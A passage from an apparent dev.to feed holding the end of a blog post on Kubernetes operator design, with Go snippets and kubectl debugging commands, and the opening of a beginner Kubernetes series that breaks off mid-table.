&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Database&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;ValidateCreate&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;admission&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Warnings&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Spec&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;StorageSize&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Cmp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;minStorage&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;fmt&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Errorf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"storage size must be at least %s"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;minStorage&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;String&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Webhooks require TLS certificates and must be running before the API server can call them. Certificate management is operationally annoying — use cert-manager or controller-runtime's built-in certificate provisioner.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Operator Patterns and Anti-Patterns
&lt;/h2&gt;

&lt;p&gt;After years of writing and reviewing operators, here's the distilled wisdom:&lt;/p&gt;

&lt;h3&gt;
  
  
  Patterns to Follow
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Adopt Whenever Possible&lt;/strong&gt;: Use server-side apply (&lt;code&gt;client.Apply&lt;/code&gt;) instead of create-or-update. It's declarative, handles field ownership correctly, and is idempotent by design. One critical caveat: if you adopt SSA, use it &lt;em&gt;consistently&lt;/em&gt; for all managed resources. Mixing &lt;code&gt;Update&lt;/code&gt; and &lt;code&gt;Apply&lt;/code&gt; on the same fields causes &lt;code&gt;managedFields&lt;/code&gt; ownership conflicts that are painful to debug and resolve.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="c"&gt;// Instead of create-or-update dance:&lt;/span&gt;
&lt;span class="n"&gt;patch&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Apply&lt;/span&gt;
&lt;span class="n"&gt;obj&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ManagedFields&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;  &lt;span class="c"&gt;// Let SSA manage this&lt;/span&gt;
&lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Patch&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;obj&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;patch&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ForceOwnership&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;FieldOwner&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"my-operator"&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Use Patch over Update&lt;/strong&gt;: Always prefer &lt;code&gt;Patch&lt;/code&gt; (specifically strategic merge patch or JSON patch) over &lt;code&gt;Update&lt;/code&gt; for status and spec changes. &lt;code&gt;Update&lt;/code&gt; replaces the entire object and is prone to conflicts; &lt;code&gt;Patch&lt;/code&gt; is surgical and conflict-resistant.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Emit Events&lt;/strong&gt;: Use the Event recorder to emit Kubernetes events for significant state transitions. This gives users visibility via &lt;code&gt;kubectl describe&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Recorder&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Event&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;corev1&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;EventTypeWarning&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"ProvisioningFailed"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to create PVC"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Separate controllers for separate concerns&lt;/strong&gt;: Don't build a monolithic reconciler. If your operator manages both the database cluster and its backup schedule, use two controllers with a shared cache.&lt;/p&gt;

&lt;h3&gt;
  
  
  Anti-Patterns to Avoid
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Don't store state in the controller process.&lt;/strong&gt; Your controller can be restarted, scaled, or fail over at any moment. The only source of truth is the Kubernetes API. If you need to persist computed state, put it in &lt;code&gt;status&lt;/code&gt; or in a ConfigMap.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Don't busy-loop with short requeue intervals.&lt;/strong&gt; In most cases, sub-10-second polling intervals are unnecessary and wasteful. Prefer watch-based triggers unless the external system cannot emit events. For fast-moving, short-lived state machines (e.g., managing transient Jobs), shorter intervals may be valid — but they should be the exception, not the default. If you truly need polling, make the interval configurable so it can be tuned per deployment.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Don't ignore &lt;code&gt;resourceVersion&lt;/code&gt; conflicts.&lt;/strong&gt; A &lt;code&gt;409 Conflict&lt;/code&gt; from the API server means someone else updated the object between your read and write. The correct response is to re-fetch and retry, not to log and continue.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Don't call the API server inside tight loops.&lt;/strong&gt; Fetching all pods to check readiness in a loop that runs every reconciliation is expensive. Use the cache, or precompute what you need at the start of reconciliation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Don't use &lt;code&gt;Update&lt;/code&gt; when &lt;code&gt;Patch&lt;/code&gt; will do.&lt;/strong&gt; Using &lt;code&gt;r.Update(ctx, obj)&lt;/code&gt; after modifying the spec will overwrite any changes made between your read and your write. Prefer patch operations.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Observability and Debugging
&lt;/h2&gt;

&lt;p&gt;An operator you can't observe is an operator you can't trust in production.&lt;/p&gt;

&lt;h3&gt;
  
  
  Metrics
&lt;/h3&gt;

&lt;p&gt;Controller-runtime exports Prometheus metrics out of the box:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Work queue depth — a leading indicator of reconciliation backlog
workqueue_depth{name="database"} 42

# Reconcile duration histogram — p99 tells you about slow reconciliations
controller_runtime_reconcile_time_seconds_bucket{controller="database", le="0.1"} 1000

# Reconcile errors — should be near zero in steady state
controller_runtime_reconcile_errors_total{controller="database"} 5

# Active goroutines in the work queue
workqueue_work_duration_seconds_bucket{name="database"}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Always add custom metrics for your domain:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="k"&gt;var&lt;/span&gt; &lt;span class="n"&gt;databasesProvisioning&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;prometheus&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NewGauge&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prometheus&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;GaugeOpts&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;Name&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s"&gt;"myoperator_databases_provisioning"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;Help&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s"&gt;"Number of databases currently in provisioning state"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Structured Logging
&lt;/h3&gt;

&lt;p&gt;Use structured logging (logr interface) with consistent fields:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="n"&gt;log&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;FromContext&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;WithValues&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="s"&gt;"database"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NamespacedName&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="s"&gt;"generation"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Generation&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="s"&gt;"phase"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Status&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Phase&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Starting reconciliation"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Tracing
&lt;/h3&gt;

&lt;p&gt;For complex operators with many API calls, distributed tracing (OpenTelemetry) provides invaluable insight into where time is spent during reconciliation.&lt;/p&gt;

&lt;h3&gt;
  
  
  Common Debugging Commands
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Watch reconciler output in real time&lt;/span&gt;
kubectl logs &lt;span class="nt"&gt;-n&lt;/span&gt; operator-system deploy/my-operator &lt;span class="nt"&gt;-f&lt;/span&gt; | jq &lt;span class="s1"&gt;'.'&lt;/span&gt;

&lt;span class="c"&gt;# Inspect the CRD resource including status&lt;/span&gt;
kubectl get database mydb &lt;span class="nt"&gt;-o&lt;/span&gt; yaml

&lt;span class="c"&gt;# Check events for a custom resource&lt;/span&gt;
kubectl describe database mydb

&lt;span class="c"&gt;# Force a reconcile by touching the annotation&lt;/span&gt;
kubectl annotate database mydb force-reconcile&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; +%s&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="nt"&gt;--overwrite&lt;/span&gt;

&lt;span class="c"&gt;# Check lease for leader election&lt;/span&gt;
kubectl get lease &lt;span class="nt"&gt;-n&lt;/span&gt; operator-system
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Production Considerations
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Resource Management
&lt;/h3&gt;

&lt;p&gt;Always set resource requests and limits on your operator pod. An operator without limits can starve other workloads during a reconciliation storm.&lt;/p&gt;

&lt;h3&gt;
  
  
  RBAC Least Privilege
&lt;/h3&gt;

&lt;p&gt;Your operator's ServiceAccount should only have the permissions it actually needs. A common mistake is granting &lt;code&gt;cluster-admin&lt;/code&gt; for convenience. Use the Kubebuilder RBAC markers to generate precise RBAC manifests:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="c"&gt;//+kubebuilder:rbac:groups=mycompany.io,resources=databases,verbs=get;list;watch;create;update;patch;delete&lt;/span&gt;
&lt;span class="c"&gt;//+kubebuilder:rbac:groups=mycompany.io,resources=databases/status,verbs=get;update;patch&lt;/span&gt;
&lt;span class="c"&gt;//+kubebuilder:rbac:groups=apps,resources=statefulsets,verbs=get;list;watch;create;update;patch;delete&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Graceful Shutdown
&lt;/h3&gt;

&lt;p&gt;Handle &lt;code&gt;SIGTERM&lt;/code&gt; gracefully. The controller-runtime manager's &lt;code&gt;Start&lt;/code&gt; function blocks until context cancellation, at which point it stops all controllers and waits for in-flight reconciliations to complete (up to a timeout). Make sure your reconciler respects context cancellation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Reconciler&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;Reconcile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Context&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Request&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c"&gt;// Check context at expensive checkpoints&lt;/span&gt;
    &lt;span class="k"&gt;select&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;-&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Done&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;{},&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Err&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="k"&gt;default&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="c"&gt;// ... reconcile logic&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Testing Strategy
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbpc9ixsnt8u824fm19au.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbpc9ixsnt8u824fm19au.png" alt="image" width="800" height="242"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Use &lt;code&gt;envtest&lt;/code&gt; (from controller-runtime) for integration tests. It spins up a real etcd and API server, installs your CRDs, and lets you test full reconciliation loops without a cluster. This is your most valuable testing layer.&lt;/p&gt;

&lt;h3&gt;
  
  
  Upgrade Considerations
&lt;/h3&gt;

&lt;p&gt;When upgrading your operator, consider:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CRD schema changes&lt;/strong&gt;: Adding fields is safe. Removing or renaming fields is breaking. Use conversion webhooks for major schema evolution.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Controller logic changes&lt;/strong&gt;: New reconciler behavior applied to existing resources — think through the transition. Add a migration annotation or one-time migration job if needed.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;State machine transitions&lt;/strong&gt;: If you're adding new phases to your state machine, ensure existing resources in "old" phases are handled by the updated controller.&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Kubernetes Operators are one of the most powerful extension mechanisms ever built into a distributed system platform. But that power comes with complexity. The controller runtime, informers, work queues, rate limiters, finalizers, and webhooks form a sophisticated machinery that, once understood, enables you to build remarkably robust automation.&lt;/p&gt;

&lt;p&gt;The key mental models to internalize:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Level-triggered reconciliation&lt;/strong&gt; — always reconcile toward desired state, don't just react to events. This gives you resilience for free.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The cache is your friend&lt;/strong&gt; — reads from cache, writes to API. This is the performance contract the entire system is designed around.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Idempotency is not optional&lt;/strong&gt; — your reconciler will be called many times for the same state. Design it accordingly from day one.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Status is a contract&lt;/strong&gt; — &lt;code&gt;observedGeneration&lt;/code&gt;, conditions with reasons and messages, precise phase transitions. This is how your operator communicates with the world.&lt;/p&gt;

&lt;p&gt;The operators you build are, in a very real sense, pieces of software that will run 24/7, autonomously managing production infrastructure. Treat them with the same rigor you'd apply to any production-critical system: test thoroughly, observe everything, and design for failure.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Ready to Build Your Own Operator?
&lt;/h2&gt;

&lt;p&gt;If you want to go from zero to production-ready Kubernetes operators with hands-on practice, check out the &lt;strong&gt;&lt;a href="https://github.com/piyushjajoo/k8s-operators-course" rel="noopener noreferrer"&gt;Kubernetes Operators Course&lt;/a&gt;&lt;/strong&gt; — a practical, end-to-end course that walks you through building operators from the basics all the way to production-grade patterns. It's a great companion to the internals covered in this post.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Found a bug or inaccuracy? The beauty of operators — and this blog post — is that there's always room for a reconciliation loop.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;Originally published at &lt;a href="https://platformwale.blog" rel="noopener noreferrer"&gt;https://platformwale.blog&lt;/a&gt;&lt;/p&gt;

</description>
      <category>kubernetes</category>
      <category>devops</category>
      <category>sre</category>
      <category>cloud</category>
    </item>
    <item>
      <title>Kubernetes for Beginners: A Multi-Part Series</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Mon, 23 Feb 2026 02:45:19 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/kubernetes-for-beginners-a-multi-part-series-53op</link>
      <guid>https://dev.to/piyushjajoo/kubernetes-for-beginners-a-multi-part-series-53op</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Who is this for?&lt;/strong&gt; Someone who has never touched Kubernetes but wants to understand it well enough to discuss it confidently — and even run a few things on their laptop.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Important mindset note:&lt;/strong&gt; Kubernetes is &lt;em&gt;not&lt;/em&gt; Heroku or a full application platform. It does not build your app, manage your CI/CD pipeline, or automatically apply production best practices. It is an &lt;strong&gt;orchestration system&lt;/strong&gt; — a very powerful one — but you still have to bring your own containers, configuration, security posture, and operational practices. Think of it as an incredibly capable infrastructure layer, not a magic button.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Part 1 — What Problem Does Kubernetes Solve?&lt;/li&gt;
&lt;li&gt;Part 2 — Core Concepts: The Kubernetes Vocabulary&lt;/li&gt;
&lt;li&gt;Part 3 — The Architecture: How It All Fits Together&lt;/li&gt;
&lt;li&gt;Part 4 — Hands-On: Your First Kubernetes App&lt;/li&gt;
&lt;li&gt;Part 5 — Deployments, Scaling, and Self-Healing&lt;/li&gt;
&lt;li&gt;Part 6 — Networking: Services and How Apps Talk to Each Other&lt;/li&gt;
&lt;li&gt;Part 7 — Configuration and Secrets&lt;/li&gt;
&lt;li&gt;Part 8 — Storage: Keeping Data Alive&lt;/li&gt;
&lt;li&gt;Part 9 — Observability: Knowing What's Going On&lt;/li&gt;
&lt;li&gt;Part 10 — Putting It All Together: The Big Picture&lt;/li&gt;
&lt;li&gt;Appendix — Common Beginner Mistakes&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Part 1 — What Problem Does Kubernetes Solve?
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The World Before Kubernetes
&lt;/h3&gt;

&lt;p&gt;Imagine you've built a web app. It runs on a single server. Life is simple. But then:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Traffic spikes — your server buckles.&lt;/li&gt;
&lt;li&gt;A new version breaks everything — you have downtime.&lt;/li&gt;
&lt;li&gt;Your server crashes at 2am — the app is down until someone wakes up.&lt;/li&gt;
&lt;li&gt;You need to run 10 copies of the app — you SSH into 10 machines manually.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is the problem Kubernetes was built to solve.&lt;/p&gt;

&lt;h3&gt;
  
  
  Containers First
&lt;/h3&gt;

&lt;p&gt;Before Kubernetes, you need containers. A &lt;strong&gt;container&lt;/strong&gt; is a lightweight, self-contained package that includes your app and everything it needs to run (libraries, runtime, config). Think of it as a shipping container: standardized, portable, stackable.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;🐳 &lt;strong&gt;Docker&lt;/strong&gt; popularized containers. If you haven't already, install Docker Desktop or an alternative like Podman:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.docker.com/products/docker-desktop/" rel="noopener noreferrer"&gt;Docker Desktop&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://podman-desktop.io/" rel="noopener noreferrer"&gt;Podman Desktop&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  So What Is Kubernetes?
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Kubernetes&lt;/strong&gt; (often abbreviated as &lt;strong&gt;K8s&lt;/strong&gt; — 8 letters between K and s) is an open-source system for &lt;em&gt;automating deployment, scaling, and management of containerized applications&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;In plain English: Kubernetes is the &lt;strong&gt;conductor of an orchestra of containers&lt;/strong&gt;. You declare &lt;em&gt;what&lt;/em&gt; you want running, and it figures out &lt;em&gt;how&lt;/em&gt; to make it happen and continuously keeps it that way.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr1yzwwwl9dfsq1m2lxd0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr1yzwwwl9dfsq1m2lxd0.png" alt="image" width="800" height="437"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Promises of Kubernetes
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Promise&lt;/th&gt;
&lt;th&gt;What it means&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Self-healing&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Crashed containers are restarted automatically&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Scaling&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Add or remove instances based on load&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Rolling updates&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Deploy new versions with zero downtime&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Service discovery&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Apps find each other without hardcoded IPs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Load balancing&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Traffic is spread across healthy instances&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  What Kubernetes Does NOT Solve (Out of the Box)
&lt;/h3&gt;

&lt;p&gt;This is important to know upfront so you're not surprised later:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Gap&lt;/th&gt;
&lt;th&gt;What fills it&lt;/th&gt;
